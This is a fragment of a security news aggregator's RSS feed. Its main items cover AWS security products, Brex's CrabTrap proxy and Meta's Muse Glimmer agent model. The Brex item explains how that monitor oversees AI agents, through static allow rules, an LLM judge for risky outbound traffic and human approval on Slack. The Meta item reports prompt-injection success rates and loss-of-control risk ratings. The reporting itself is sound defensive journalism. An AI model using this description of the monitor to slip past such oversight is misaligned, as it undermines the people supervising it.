harvesting detections Fuller described. The console is where AWS delivers its opinion to the enterprise. Continuum is the sharpest opinion it has shipped.</p><p>The audience for that opinion has changed as well, Kapoor said. Mythos, he argued, moved security from something the CISO owned to a CEO and board-level imperative. "Boards are now asking for updates on what's going on with security in the enterprise because it's a business threat now, it's a business risk."</p><h2><b>AWS's security ambitions reflect a calculated bet on owning the orchestration layer</b></h2><p>The twin launches fit within a broader strategic arc AWS has been building throughout 2026 at a breakneck pace. The company re-imagined <a href="https://aws.amazon.com/blogs/security/aws-launches-ai-enhanced-security-innovations-at-reinvent-2025/">Security Hub at re:Invent 2025</a> by consolidating <a href="https://aws.amazon.com/guardduty/">GuardDuty</a>, <a href="https://aws.amazon.com/inspector/">Inspector</a>, <a href="https://aws.amazon.com/security-hub/cspm/">CSPM</a>, and <a href="https://aws.amazon.com/iam/access-analyzer/">Access Analyzer</a> into a single console. In February, it launched Security Hub Extended with 14 curated partner solutions. By May, that number grew to 21 across nine categories. Now it stands at 23 across 10. Continuum launched at the New York Summit in June and expanded to OpenAI and Anthropic integrations at Black Hat in August.</p><p>AWS generated <a href="https://ir.aboutamazon.com/news-release/news-release-details/2026/Amazon-com-Announces-Second-Quarter-Results/">$42.2 billion in revenue during Q2 2026</a>, with cloud sales expanding 37% year over year. The company holds a 28% share of the global cloud infrastructure market, ahead of Microsoft at 20% and Google at 15%.</p><p>Fuller told VentureBeat that AWS has "tens of thousands of customers using one or multiple of our security services, essentially across all geos that we operate in, and in every industry, and both commercial and government." The Extended plan aims to convert that installed base into users of partner security solutions — deepening engagement and making it harder for competitors to dislodge AWS as the default platform.</p><p>By making AWS the seller of record for 23 partner security solutions and embedding <a href="https://aws.amazon.com/blogs/security/aws-partners-with-anthropic-and-openai-to-bring-aws-continuum-into-developer-workflows/">Continuum</a> inside the coding environments of <a href="https://openai.com/">OpenAI</a> and <a href="https://www.anthropic.com/">Anthropic</a>, AWS is constructing something more durable than a product line. It is building the connective tissue between enterprises and every AI model they use, between every open source package they pull, and between every security vendor they deploy. In a world where frontier models are advancing so rapidly that today's best scanner becomes tomorrow's table stakes, the layer that persists is not the model — it is the harness that connects the model to the customer's environment, policies, and risk tolerance.</p><p>Kapoor, reflecting on a chance conversation he had on a flight to <a href="https://blackhat.com/us-26/">Black Hat</a>, offered the simplest articulation of why all of it matters. A former CISO turned CTO sitting beside him volunteered a blunt assessment of the current moment: "I don't feel safer now." Kapoor's response, he told VentureBeat, was equally blunt: "We're working on it."</p><p>Whether that work makes the world safer or simply makes AWS indispensable to every organization trying to get there may, in the end, amount to the same thing.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Brex assumes its AI agents could do anything — so it watches the network, not the code]]></title>
<description><![CDATA[Brex CEO Pedro Franceschi offered a blueprint for one of the pressing challenges facing the enterprise today at VB Transform 2026: securely deploying AI agents, like the open-source OpenClaw, into production environments.Unlocking this enterprise value requires a mindset shift. The industry needs...]]></description>
<link>https://tsecurity.de/de/3713276/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713276/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 00:51:02 +0200</pubDate>
<content:encoded><![CDATA[<p>Brex CEO Pedro Franceschi offered a blueprint for one of the pressing challenges facing the enterprise today at <a href="https://venturebeat.com/vbtransform2026">VB Transform 2026</a>: securely deploying AI agents, like the open-source OpenClaw, into production environments.</p><p>Unlocking this enterprise value requires a mindset shift. The industry needs to move past vague terminology and focus on concrete enterprise roles. </p><p>“People talk a lot about agents, but I think 'agents' is a terrible name. It's this Silicon Valley concept that doesn't really mean much,” Franceschi said. </p><p>Instead, the goal should be creating entities that can genuinely collaborate with human workers. "The concept we always had in mind was the idea of a virtual employee — someone on Slack, an entity, it has an email address, it can join meetings, you can email it, and that you can work with," Franceschi said.</p><p>Realizing this vision demands a new security paradigm. Franceschi’s presentation detailed how Brex pointed OpenClaw at internal roles, realized traditional security models failed, and built a novel network-level security layer called CrabTrap.</p><div></div><h2>The OpenClaw security dilemma</h2><p>The journey began following a breakthrough in December, when coding models reached a level of maturity that enabled the January release of <a href="https://venturebeat.com/security/openclaw-agentic-ai-security-risk-ciso-guide">OpenClaw</a>. This marked the moment agents could finally self-bootstrap and maintain their own codebases instead of relying on hard-coded, static tools. </p><p>However, when Franceschi proposed deploying this to automate internal functions, the Brex security team firmly rejected the idea.  <!-- -->“They said, 'Hell no. How could we trust an agent doing these things? This thing has code execution capabilities. There's no way to control it,'” Franceschi said. <!-- -->That caution isn't unique to Brex — enterprises broadly have been <a href="https://venturebeat.com/security/openclaw-can-bypass-your-edr-dlp-and-iam-without-triggering-a-single-alert">wary of granting agents uncontrolled code execution</a> on corporate networks.</p><p>To solve this, Brex had to shift the security perimeter. Franceschi contrasted this with approaches like <a href="https://venturebeat.com/technology/nvidia-lets-its-claws-out-nemoclaw-brings-security-scale-to-the-agent">Nvidia's NemoClaw</a>, which he said secure agents by limiting their tool usage — a model he believes neutralizes the coding capabilities that give agents their value.</p><p>“… the premise we had was that the coding capabilities were critical to the model having the ability to do a variety of tasks,” he said. </p><p>Brex's fix was to shift the security boundary to the network layer instead. Instead of policing the ever-changing code inside the container, the focus must shift to monitoring what the code actually attempts to send or receive from the outside world.</p><h2>CrabTrap and the LLM-as-a-judge solution</h2><p>This network-centric approach led to the creation of <a href="https://venturebeat.com/orchestration/brex-built-its-ai-agent-policy-by-watching-what-agents-actually-do-not-by-writing-rules-first">CrabTrap</a>, an open-source HTTP proxy built by Brex. The mechanism operates on the assumption that OpenClaw can do anything and might already be compromised. Therefore, CrabTrap monitors all outbound network traffic between the container and the internet, using an LLM to judge whether that traffic aligns with the agent's approved policy.</p><p>“Instead of trying to control the code running in the container, assume the thing can do anything and monitor the network traffic between that container and the internet,” Franceschi said. </p><p>Using a large language model (LLM) to judge every single network request introduces unacceptable latency, often adding thousands of milliseconds to response times. Brex solved this by passing traffic through a bifurcated system. </p><p>Routine, low-risk actions pass through static, pre-approved rules instantly. If a recruiting agent tries to view a LinkedIn profile, the static rule allows it. However, high-risk actions such as sending emails are flagged and routed to the LLM judge for evaluation. Franceschi said that architecture ensures only about 2% of complex requests actually face LLM latency. </p><p>A surprising finding from the project was how effectively the LLM judge performs this role. Franceschi attributed this to the models' training: LLMs are exposed to billions of web pages and HTTP requests, giving them what he described as an inherent semantic understanding of network traffic patterns.</p><p>“[Models] are very good at discerning what is within the policy and what is not,” Franceschi said, adding that this capability emerges naturally through pre-training without needing heavy prompting.</p><p>Brex put this infrastructure to the test with “Jim,” a virtual recruiter built on OpenClaw. Jim handles various tasks, including sourcing candidates, scoring inbound applicants, and sending emails. </p><p>When Jim attempts an action that falls outside the established policy, CrabTrap relies on a human-in-the-loop workflow. If the LLM judge flags an unapproved outbound email, CrabTrap pings a human manager on Slack. </p><p>The Slack notification explains the agent's underlying intent and suggests a policy change that would allow the action. The human manager can then review the context and click "yes" or "no" to update the rules dynamically. </p><p>"I like the virtual employee analogy because a lot of these things were solved already in a company, in the context of humans," Franceschi said. "When an employee hits a wall, they escalate to their manager."</p><h2>The cost of the frontier</h2><p>Brex is a fintech company, not a cybersecurity vendor. The decision to build CrabTrap in-house was driven by a lack of mature commercial solutions that could satisfy their security team. </p><p>Franceschi acknowledged the inherent cost of operating at the bleeding edge, admitting that commercial vendor solutions will likely catch up. </p><p>“When we built this, it was clear to me there was a 70% chance we would throw it away in six months... But what we learned by being six months ahead was worth it in shaping our AI adoption strategy,” he said. </p><p>The investment in building internal tools provided Brex with the experience needed to safely deploy agents months ahead of the broader market. For enterprise leaders navigating the AI landscape, the core takeaway is the necessity of building the cultural and technical muscle to operate in an agentic world today. </p><p>“We don't have all the answers, but the answer is not to do nothing,” Franceschi said.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta returns to open source with Muse Glimmer, an Apache 2.0 licensed 30B parameter AI model optimized for agents — available now]]></title>
<description><![CDATA[Meta today released Muse Glimmer, a 30-billion-parameter open-weight model designed to run autonomous AI agents directly on consumer hardware — pushing agentic workloads that normally depend on cloud infrastructure onto high-end Macs and PCs.Just as notable as what the model does is how it's lice...]]></description>
<link>https://tsecurity.de/de/3713277/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713277/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 00:51:02 +0200</pubDate>
<content:encoded><![CDATA[<p>Meta today<a href="https://research.meta.ai/blog/introducing-muse-glimmer-open-agentic-model"> released Muse Glimmer, a 30-billion-parameter open-weight model</a> designed to run autonomous AI agents directly on consumer hardware — pushing agentic workloads that normally depend on cloud infrastructure onto high-end Macs and PCs.</p><p>Just as notable as what the model does is how it's licensed. Glimmer arrives under the permissive, industry-standard Apache 2.0 open source license — the company's first fully open release since it succeeded its open-weight Llama family in<a href="https://venturebeat.com/technology/goodbye-llama-meta-launches-new-proprietary-ai-model-muse-spark-first-since"> April with the proprietary Muse Spark</a>.</p><p>In fact, Muse Glimmer launches today with a <i>more </i>permissive license than Llama ever carried. Llama's bespoke community license drew years of criticism for restrictions like its 700-million-monthly-user cutoff; Apache 2.0 has no such strings, permitting unrestricted commercial use, modification and redistribution.</p><p>The weights are <a href="https://huggingface.co/meta-models/Muse-Glimmer-30B">available on Hugging Face now</a>. Wang said support is rolling out this week through Ollama, LM Studio, vLLM, SGLang, Together AI, Fireworks AI and OpenRouter, with optimized llama.cpp, MLX and ExecuTorch integrations landing in the coming days; Meta's blog post also names Unsloth as a local-runtime partner and points to PyTorch's TorchTitan for fine-tuning. The company says it is working with AMD, Arm, Dell, Intel and Nvidia to optimize performance across devices, and has published <a href="https://developer.meta.com/ai/models/muse-glimmer/">developer documentation </a>covering custom agent scaffolds.</p><p>"Today we're also opening the weights for Muse Glimmer, a great 30B parameter dense model that can run locally," Meta co-founder and CEO Mark Zuckerberg wrote in a post on X (under his longtime handle <a href="https://x.com/finkd/status/2086755195535413696">@finkd)</a>. "Soon we'll also release the weights for Muse Spark 1.2, our latest foundation model. Meta is a strong supporter of open source and I'm proud of these releases."</p><p>That promised Muse Spark 1.2 release would be an even bigger shift: it's the<a href="https://venturebeat.com/orchestration/meta-enters-the-ai-coding-wars-with-muse-spark-1-2-and-muse-code-with-persistent-async-background-agents"> frontier model behind Muse Code</a>, the terminal coding agent Meta shipped just five days ago, and until today the entire Muse family was proprietary. Zuckerberg had teased at that launch that he'd "have more to share soon" on open source. Now we know what he meant.</p><p>For developers and enterprises, the practical stakes of local inference go beyond where computation happens. An agent working with files, screenshots, development environments and other sensitive context can execute those workflows without continuously sending that information to a remote inference service. Local deployment also removes network availability and per-token API charges from the inference loop — although organizations still bear hardware, electricity, deployment and management costs.</p><h2><b>A 30B model built around the agent loop</b></h2><p>Rather than positioning Glimmer primarily as a general chatbot, Meta trained it around the sequence of operations an autonomous agent performs: formulate a plan, call tools, interpret the results, continue working, and recover when something goes wrong.</p><p>"Just like much larger models, muse glimmer can operate as a fully capable agent via planning, tool calls, checking its own results, and failure recovery," Alexandr Wang, Meta's chief AI officer, wrote in<a href="https://x.com/alexandr_wang/status/2086756152034066792"> a thread on X</a> announcing the release, adding that the model "can run on 24GB of VRAM without losing agentic reliability."</p><p>According to the <a href="https://huggingface.co/meta-models/Muse-Glimmer-30B">model card on Hugging Face</a>, Glimmer is a dense causal transformer with approximately 29.6 billion total parameters across 52 layers, including a dedicated ~1.8B-parameter ViT-G/14 perception encoder. It accepts interleaved text and images, produces text, supports more than 100 languages and has a stated context length of 131,072 tokens or more, with a knowledge cutoff of January 4, 2026.</p><p>That combination is intended to let an agent interpret screenshots, charts and documents while simultaneously reasoning about text and invoking external tools. Glimmer offers low, medium, high and xhigh reasoning settings — set via the system prompt — so applications can dial reasoning effort up or down per task, and Meta says it works across agentic scaffolds including OpenClaw and Hermes Agent.</p><p>The model is a distillation of Meta's larger flagship: per the company's <a href="https://research.meta.ai/blog/introducing-muse-glimmer-open-agentic-model">technical blog post</a>, Glimmer was pre-trained on Muse Spark's outputs using logit distillation, mid-trained on longer-context, agent-heavy data with richer reasoning traces, then post-trained with supervised fine-tuning, on-policy distillation and reinforcement learning across general, reasoning, coding and agentic domains.</p><p>Meta demonstrated the result with a local Home Assistant workflow: in a demo video, Glimmer autonomously discovers a Home Assistant instance on the network via tool calls, queries device APIs, writes a responsive HTML/CSS/JavaScript dashboard from scratch and deploys a local server to verify its own work. That's closer to the operational reality of enterprise agent deployments than a standalone question-answering benchmark — the model has to maintain a plan while interacting with external systems, then inspect whether its actions produced the expected result.</p><h2><b>Compressing an agent into 24GB</b></h2><p>The hardware story is central to the release.</p><p>At full precision, Meta says the 30B model requires more than 55GB of memory — beyond any single consumer GPU. </p><p>The company therefore developed approximately 4-bit quantized versions that shrink the language-model weights to under 20GB, leaving headroom for the pieces an operational agent also needs in memory: the KV cache, the perception encoder and a companion speculative-decoding model, all fitting within a 24GB or 32GB envelope.</p><p>In practical terms, that means the quantized builds run on consumer machines — though the upper end of them. The 24GB-targeted K-Quant-17GB configuration fits on a single high-end consumer graphics card, such as Nvidia's RTX 3090 or RTX 4090 (both with 24GB of VRAM), while the 32GB-targeted K-Quant-Dynamic version lines up with the newer RTX 5090's 32GB. On the Mac side, Apple Silicon's unified memory plays the role of VRAM, so a MacBook Pro or Mac Studio with 32GB or more of memory can hold the full stack — Meta ran its own speed tests on M4 Max and M5 Max MacBook Pros. A typical 8GB or 16GB laptop, however, remains out of reach, and the full-precision BF16 release — which Meta pegs at 64GB — stays in the territory of data-center GPUs and top-spec Mac Studio configurations.</p><p>Meta reports average accuracy degradation of just 0.2% across 15 benchmarks for its K-Quant-Dynamic version targeting 32GB hardware, and 1% for the K-Quant-17GB configuration targeting 24GB hardware. Those figures are Meta's own measurements, not independent evaluations.</p><p>Meta is also using DFlash speculative decoding to attack the other big problem with local agents: latency. Instead of generating every token sequentially, a smaller DFlash "drafter" model proposes blocks of 16 tokens that the primary model verifies in parallel, producing identical output faster.</p><p>Meta reports this raises average generation speed on an Nvidia RTX 5090 from 74.9 tokens per second to 233.4 — a 3.1x increase. An Apple M5 Max rises from 26.6 to 50.2 tokens per second (1.8x), and an M4 Max from 23.7 to 37.8 (1.5x). The tests used batch size one and greedy decoding, with Apple systems measured via ExecuTorch and the RTX 5090 via llama.cpp.</p><p>For agent applications, those multipliers matter more than they would for chat: a single user request can trigger many model turns, tool calls and verification steps, and latency accumulated at every stage can quickly make an otherwise capable agent impractical.</p><h2><b>Glimmer enters an increasingly competitive local-model market</b></h2><p>Meta is not entering an empty field. Developers already have capable open-weight models in this size class, most prominently Google's Gemma 4 family and Alibaba's Qwen3.6-27B — both of which position themselves around reasoning, multimodal understanding and agentic workloads. Meta's own benchmark table compares directly against both.</p><p>Glimmer leads that three-way comparison on several agentic tests, including MCP Atlas at 75.5, DeepSearch QA at 74.6, τ³-Banking at 23.5, WildClawBench at 47.6 and GAIA2 at 43.3. It scores 51.2 on SWE-Bench Pro, versus 36.9 for Gemma4-31B and 50.2 for Qwen3.6-27B in Meta's evaluation.</p><p>But Glimmer does not sweep the field. Qwen leads Meta's own comparison on OSWorld-Verified (75.6 vs. Glimmer's 65.9), TerminalBench 2.1 (60.7 vs. 51.7), SkillsBench, GDPval-AA (1141 vs. 953) and most of the multimodal benchmarks. On SWE-Bench Verified, Glimmer's 76.0 lands just below Qwen's 77.2. Gemma leads on GPQA Diamond and Humanity's Last Exam.</p><p>Read honestly, the numbers make Glimmer more interesting as a specialized local-agent model than as evidence of a universal performance lead. For enterprise developers, the practical question is whether its combination of agent reliability, quantization quality, tool compatibility and decoding speed translates from benchmarks into sustained real-world workflows.</p><table><tbody><tr><td><p><b>Model</b></p></td><td><p><b>Developer / origin</b></p></td><td><p><b>AA score</b></p></td><td><p><b>Parameters / context</b></p></td><td><p><b>Lowest tracked API price</b></p></td><td><p><b>Access</b></p></td><td><p><b>License</b></p></td><td><p><b>Strongest use cases</b></p></td></tr><tr><td><p><a href="https://huggingface.co/moonshotai/Kimi-K3">Kimi K3</a></p></td><td><p>Moonshot AI; China</p></td><td><p>60</p></td><td><p>2.8T total / 104B active; 1M</p></td><td><p>$3.00 input / $15.00 output via Kimi, Fireworks or Modal (<a href="https://artificialanalysis.ai/models/kimi-k3/providers">pricing</a>)</p></td><td><p><a href="https://huggingface.co/moonshotai/Kimi-K3">Weights</a></p><p><a href="https://platform.kimi.ai/">Kimi API</a></p></td><td><p>Custom Kimi K3 license. Large model-as-a-service operators above $20M in 12-month revenue need a separate agreement</p><p>Large products may need to display “Kimi K3.”</p></td><td><p>Frontier long-horizon coding</p><p>Multimodal research and complex tool-driven agents</p></td></tr><tr><td><p><a href="https://huggingface.co/zai-org/GLM-5.2">GLM-5.2</a></p></td><td><p>Z.ai / Zhipu AI; China</p></td><td><p>53</p></td><td><p>753B / 40B active; 1M</p></td><td><p>$0.75 / $2.40 via DeepInfra FP4 (<a href="https://artificialanalysis.ai/models/glm-5-2/providers">pricing</a>)</p></td><td><p><a href="https://huggingface.co/zai-org/GLM-5.2">Weights</a></p><p><a href="https://docs.z.ai/">Z.ai API</a></p></td><td><p>MIT</p></td><td><p>Long-horizon coding and agents</p><p>Million-token analysis with adjustable reasoning</p></td></tr><tr><td><p><a href="https://huggingface.co/deepseek-ai/DeepSeek-V4-Flash-0731">DeepSeek V4 Flash 0731</a></p></td><td><p>DeepSeek; China</p></td><td><p>52</p></td><td><p>284B / 13B active; 1M</p></td><td><p>$0.09 / $0.18 via DeepInfra (<a href="https://artificialanalysis.ai/models/deepseek-v4-flash/providers">pricing</a>)</p></td><td><p><a href="https://huggingface.co/deepseek-ai/DeepSeek-V4-Flash-0731">Weights</a></p><p><a href="https://api-docs.deepseek.com/">DeepSeek API</a></p></td><td><p>MIT</p></td><td><p>• Extremely economical reasoning• Coding agents, terminal work and tool use</p></td></tr><tr><td><p><a href="https://huggingface.co/MiniMaxAI/MiniMax-M3">MiniMax-M3</a></p></td><td><p>MiniMax; China</p></td><td><p>45</p></td><td><p>428B / 23B active; 1M</p></td><td><p>$0.23 / $0.96 via CoreWeave (<a href="https://artificialanalysis.ai/models/minimax-m3/providers">pricing</a>)</p></td><td><p><a href="https://huggingface.co/MiniMaxAI/MiniMax-M3">Weights</a></p><p>; </p><p><a href="https://platform.minimax.io/">MiniMax API</a></p></td><td><p>MiniMax Community License. Commercial attribution required; companies above $20M yearly revenue need authorization. Includes prohibited-use conditions.</p></td><td><p>• Native text, image and video work• Long-context coding and “cowork” agents</p></td></tr><tr><td><p><a href="https://huggingface.co/XiaomiMiMo/MiMo-V2.5-Pro">MiMo-V2.5-Pro</a></p></td><td><p>Xiaomi; China</p></td><td><p>43</p></td><td><p>1.02T / 42B active; 1M</p></td><td><p>$0.35 / $0.70 via GMI (<a href="https://artificialanalysis.ai/models/mimo-v2-5-pro/providers">pricing</a>)</p></td><td><p><a href="https://huggingface.co/XiaomiMiMo/MiMo-V2.5-Pro">Weights</a></p><p><a href="https://platform.xiaomimimo.com/">Xiaomi API</a></p></td><td><p>MIT</p></td><td><p>Complex software engineering</p><p>Agents spanning thousands of tool calls</p></td></tr><tr><td><p><a href="https://huggingface.co/thinkingmachines/Inkling">Inkling</a></p></td><td><p>Thinking Machines Lab; U.S.</p></td><td><p>42</p></td><td><p>975B / 41B active; 1M in weights</p></td><td><p>$0.95 / $4.05 via DeepInfra FP8 (<a href="https://artificialanalysis.ai/models/inkling/providers">pricing</a>)</p></td><td><p><a href="https://huggingface.co/thinkingmachines/Inkling">Weights</a></p><p><a href="https://thinkingmachines.ai/tinker/">Tinker</a></p></td><td><p>Apache 2.0</p></td><td><p>Customizable text, image and audio foundation</p><p>Fine-tuned coding, RAG and tool-use systems</p></td></tr><tr><td><p><a href="https://huggingface.co/nvidia/NVIDIA-Nemotron-3-Ultra-550B-A55B-BF16">Nemotron 3 Ultra 550B A55B</a></p></td><td><p>NVIDIA; U.S.</p></td><td><p>38</p></td><td><p>550B / 55B active; up to 1M in weights</p></td><td><p>$0.37 / $1.08 via Blackbox AI (<a href="https://artificialanalysis.ai/models/nvidia-nemotron-3-ultra-550b-a55b/providers">pricing</a>)</p></td><td><p><a href="https://huggingface.co/nvidia/NVIDIA-Nemotron-3-Ultra-550B-A55B-BF16">Weights</a></p></td><td><p>OpenMDW-1.1; permissive commercial and derivative-model rights</p></td><td><p>Complex agents and long-context reasoning</p><p>High-accuracy RAG, code, math and science</p></td></tr><tr><td><p><a href="https://huggingface.co/mistralai/Mistral-Medium-3.5-128B">Mistral Medium 3.5</a></p></td><td><p>Mistral AI; France</p></td><td><p>30</p></td><td><p>128B dense; 256K</p></td><td><p>$1.50 / $7.50 via Mistral (<a href="https://artificialanalysis.ai/models/mistral-medium-3-5/providers">pricing</a>)</p></td><td><p><a href="https://huggingface.co/mistralai/Mistral-Medium-3.5-128B">Weights</a></p><p><a href="https://docs.mistral.ai/models/model-cards/mistral-medium-3-5-26-04">Mistral API</a></p></td><td><p>Modified MIT. Companies above $20M consolidated monthly revenue must obtain a commercial license or use Mistral’s service.</p></td><td><p>Coding agents and function calling</p><p>Multimodal instruction following</p></td></tr><tr><td><p><a href="https://huggingface.co/google/gemma-4-31B-it">Gemma 4 31B</a></p></td><td><p>Google DeepMind; U.S.</p></td><td><p>30</p></td><td><p>30.7B dense; 256K</p></td><td><p>Free on Google AI Studio’s limited tier; paid low $0.10 / $0.34 via CoreWeave (<a href="https://artificialanalysis.ai/models/gemma-4-31b/providers">pricing</a>)</p></td><td><p><a href="https://huggingface.co/google/gemma-4-31B-it">Weights</a></p><p><a href="https://aistudio.google.com/">Google AI Studio</a></p></td><td><p>Apache 2.0</p></td><td><p>Compact multimodal reasoning and coding</p><p>Manageable local or private-server deployments</p></td></tr><tr><td><p><a href="https://huggingface.co/openai/gpt-oss-120b">gpt-oss-120b</a></p></td><td><p>OpenAI; U.S.</p></td><td><p>24</p></td><td><p>117B / 5.1B active; 131K</p></td><td><p>$0.03 / $0.17 via CoreWeave (<a href="https://artificialanalysis.ai/models/gpt-oss-120b/providers">pricing</a>)</p></td><td><p><a href="https://huggingface.co/openai/gpt-oss-120b">Weights</a> </p><p>Numerous third-party APIs</p></td><td><p>Apache 2.0</p></td><td><p>Reasoning </p><p>structured output and tools</p><p>Fine-tuning and single-80GB-GPU deployment</p></td></tr><tr><td><p><a href="https://huggingface.co/CohereLabs/command-a-plus-05-2026-bf16">Command A+</a></p></td><td><p>Cohere; Canada</p></td><td><p>23</p></td><td><p>218B / 25B active; 128K input</p></td><td><p>Free on Cohere’s currently tracked endpoint (<a href="https://artificialanalysis.ai/models/command-a-plus/providers">pricing</a>)</p></td><td><p><a href="https://huggingface.co/CohereLabs/command-a-plus-05-2026-bf16">Weights</a></p><p><a href="https://cohere.com/blog/command-a-plus">Cohere</a></p></td><td><p>Apache 2.0</p></td><td><p>Enterprise RAG and grounded citations• Multilingual agents and document processing</p></td></tr><tr><td><p><a href="https://huggingface.co/meta-models/Muse-Glimmer-30B">Muse Glimmer 30B</a></p></td><td><p>Meta; U.S.</p></td><td><p>Not yet scored</p></td><td><p>29.6B dense, including vision encoder; 131K+</p></td><td><p>No public metered hosted price located on launch day</p></td><td><p><a href="https://huggingface.co/meta-models/Muse-Glimmer-30B">Weights</a></p><p><a href="https://developer.meta.com/ai/models/muse-glimmer/">Meta model page</a></p></td><td><p>Apache 2.0 for full-precision weights, quantizations, drafter and perception encoder</p></td><td><p>Always-on local agents on 24–32GB systems</p><p>Tool use, recovery, coding and screen/document understanding</p></td></tr></tbody></table><p>Meta Glimmer adds to a still-small roster of genuinely open, frontier-class models from U.S. companies.</p><p>For the last two years, Chinese companies have set the pace in open source AI, with DeepSeek, Alibaba's Qwen team, Moonshot AI's Kimi, Zhipu's GLM and MiniMax <a href="https://www.understandingai.org/p/the-best-chinese-open-weight-models">shipping frontier-class open models under MIT and Apache 2.0 licenses</a> on a cadence Western labs haven't matched. </p><p>The usage data reflects it: by May 2026, Chinese open-weight models accounted for <a href="https://www.datagravity.dev/p/chinas-open-weight-takeover">roughly 61% of all tokens consumed on OpenRouter</a>, with four of the five most-used models coming from Chinese labs — while Meta's Llama, the prior open-weight leader, fell off the rankings entirely.</p><p>The U.S. counterexamples remain countable on one hand: OpenAI's <a href="https://venturebeat.com/business/openai-returns-to-open-source-roots-with-new-models-gpt-oss-120b-and-gpt-oss-20b">gpt-oss-120b and gpt-oss-20b</a>, released under Apache 2.0 in August 2025 as the company's first open weights since GPT-2; Google's Gemma family, which is open-weight but ships under Google's own more restrictive custom license rather than an OSI-approved one; and Thinking Machines' Inkling. </p><p>Glimmer invites the most direct comparison to gpt-oss: both are Apache 2.0, both offer adjustable reasoning effort, and both target self-hosted deployment. </p><p>But the gpt-oss models are text-only, sparse mixture-of-experts designs built primarily for reasoning and tool use — gpt-oss-20b fits in about 16GB of memory while gpt-oss-120b targets a single 80GB data center GPU. </p><p>Glimmer stakes out different ground: a dense model with native vision input, trained end-to-end around the agent loop, shipping with its own quantized variants and speculative-decoding drafter tuned for 24GB consumer machines. </p><p>And if Zuckerberg follows through on opening Muse Spark 1.2's weights, Meta would put an actual U.S. flagship frontier model into open circulation — something no American lab has done at that tier.</p><h2><b>Safety remains part of the deployment architecture</b></h2><p>Giving a local model access to tools creates a different security problem from deploying a local chatbot — and Meta's own safety numbers show Glimmer is not uniformly stronger than its peers.</p><p>On CI Memories, a privacy benchmark where lower violation rates are better, Glimmer records 26.4 against Gemma's 12.1 and Qwen's 53.4. On Siren AgentDojo, a prompt-injection test, Glimmer shows a 28.4% attack-success rate versus 25.6% for Gemma and 40.3% for Qwen — while posting the highest utility score of the three at 94.2.</p><p>Meta says it evaluated Glimmer under its <a href="https://ai.meta.com/blog/scaling-how-we-build-test-advanced-ai/">Advanced AI Scaling Framework</a> and determined the model does not meet the framework's definition of "Frontier AI" because it is generally less capable than Muse Spark. Its Preparedness Team assessed Glimmer at Moderate or lower risk across chemical/biological, cyber and loss-of-control categories — the latter two inferred from the fact that Glimmer is broadly weaker than Muse Spark 1.0, which received the same designations.</p><p>The company nevertheless recommends deploying Glimmer as part of a broader system with guardrails, including human-in-the-loop confirmation for irreversible actions. That caveat matters especially for local agents: keeping data on-device reduces exposure to cloud infrastructure, but local execution does not by itself solve prompt injection, excessive permissions or an agent taking an unintended action.</p><h2><b>Apache 2.0 weights and a fast-growing runtime ecosystem</b></h2><p>Meta is releasing full-precision BF16 weights, both 4-bit quantized variants, the DFlash drafter and the perception encoder — all under Apache 2.0. There is no Meta API price attached to the downloadable model, leaving total cost dependent on local hardware or whatever third-party hosting developers choose. One nuance worth noting for procurement teams: as with most "open source" model releases, it is the weights that are open — Meta has not released the training data or training code.</p><p>The broader implication is that Meta is treating the developer workstation as a credible deployment target for autonomous agents, rather than merely a place to experiment with smaller language models. Glimmer's 30B size and 24GB target put that proposition within reach of high-end consumer hardware, while the Apache 2.0 license gives developers — and their legal departments — unusual freedom to modify and deploy it.</p><p>The next test is whether its benchmark advantages survive the messier conditions of real software repositories, enterprise tools and long-running agent sessions. If they do, the most consequential part of Glimmer may not be another set of benchmark scores — it may be that a class of agent previously expected to live behind a cloud API can increasingly live, and work, on the machine sitting under a developer's desk.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[We spend £1.6bn a year on subscriptions we don’t want — fast tracked UK Government policy promises to make cancelling them easier, and will make ‘phoney bargains’ illegal]]></title>
<description><![CDATA[Andy Burnham government tackling ‘phoney bargains’ and ‘making it as easy to leave a subscription as it is to join’]]></description>
<link>https://tsecurity.de/de/3713227/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713227/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 00:50:58 +0200</pubDate>
<content:encoded><![CDATA[Andy Burnham government tackling ‘phoney bargains’ and ‘making it as easy to leave a subscription as it is to join’]]></content:encoded>
</item>
<item>
<title><![CDATA[The Rise of the 1 am Job Interview]]></title>
<description><![CDATA[An AI interview is increasingly the first step of a hiring process. Since there’s no human on the other end, candidates are scheduling them whenever—even deep into the night.]]></description>
<link>https://tsecurity.de/de/3713162/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713162/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 00:50:50 +0200</pubDate>
<content:encoded><![CDATA[An AI interview is increasingly the first step of a hiring process. Since there’s no human on the other end, candidates are scheduling them whenever—even deep into the night.]]></content:encoded>
</item>
<item>
<title><![CDATA[B2B: Wie KI SaaS verschlingt]]></title>
<description><![CDATA[In Zeiten von Vibe-Coding zahlt niemand mehr Abertausende für eine mäßig passende Software. SaaS-Anbieter müssen sich etwas einfallen lassen. Von Namanyay Goel (SaaS, KI)]]></description>
<link>https://tsecurity.de/de/3712888/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3712888/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 00:49:26 +0200</pubDate>
<content:encoded><![CDATA[In Zeiten von Vibe-Coding zahlt niemand mehr Abertausende für eine mäßig passende Software. SaaS-Anbieter müssen sich etwas einfallen lassen. Von Namanyay Goel (<a href="https://www.golem.de/specials/saas/">SaaS</a>, <a href="https://www.golem.de/specials/ki/">KI</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=206763&amp;page=1&amp;ts=1786356002" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[Dark Matter Season 2 Release Date, Cast, Plot and Everything We Know]]></title>
<description><![CDATA[Dark Matter Season 2 finally has a release date, with Apple TV bringing Joel Edgerton and Jennifer Connelly back for another trip through the multiverse on August 28, 2026. The new season will continue directly after the first season while taking the story beyond Blake Crouch’s original novel.


...]]></description>
